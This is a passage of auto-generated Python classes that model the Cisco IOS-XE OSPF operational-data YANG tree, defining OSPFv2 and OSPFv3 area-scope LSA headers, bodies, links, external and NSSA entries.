self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, ['lsa_type'], name, value)
class AreaScopeLsa_(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, self).__init__()
self.yang_name = "area-scope-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type','adv_router']
self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
])
self.lsa_type = None
self.adv_router = None
self.decoded_completed = None
self.raw_data = []
self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa()
self.ospfv3_lsa.parent = self
self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"
self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix = YList(self)
self.ospfv3_ia_prefix = YList(self)
self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
class Ospfv2Lsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, self).__init__()
self.yang_name = "ospfv2-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv2-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, [], name, value)
class Header(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
])
self.lsa_id = None
self.opaque_type = None
self.opaque_id = None
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self.flag_options = Bits()
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
class LsaBody(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network))])
self._leafs = OrderedDict([
('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
])
self.num_of_links = None
self.summary_mask = None
self.external_mask = None
self.body_flag_options = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
class Network(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
])
self.network_mask = None
self.attached_router = []
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, self).__init__()
self.yang_name = "ospfv2-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_id','link_data']
self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology))])
self._leafs = OrderedDict([
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
])
self.link_id = None
self.link_data = None
self.type = None
self.ospfv2_topology = YList(self)
self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
class Ospfv2Topology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "ospfv2-link"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, self).__init__()
self.yang_name = "ospfv2-external"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
])
self.mt_id = None
self.metric = None
self.forwarding_address = None
self.external_route_tag = None
self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv3Lsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, self).__init__()
self.yang_name = "ospfv3-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv3-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, [], name, value)
class Header(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
])
self.lsa_id = None
self.lsa_hdr_options = Bits()
self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader()
self.lsa_header.parent = self
self._children_name_map["lsa_header"] = "lsa-header"
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
class LsaHeader(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, self).__init__()
self.yang_name = "lsa-header"
self.yang_parent_name = "header"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
])
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self._segment_path = lambda: "lsa-header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix))])
self._leafs = OrderedDict([
('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"
self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"
self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"
self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"
self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
])
self.attached_router = []
self.lsa_net_options = Bits()
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
])
self.metric = None
self.ia_prefix = None
self.ia_prefix_options = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()
self.yang_name = "ia-router"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
])
self.metric = None
self.destination_router_id = None
self.lsa_ia_options = Bits()
self._segment_path = lambda: "ia-router"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()
self.yang_name = "lsa-external"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
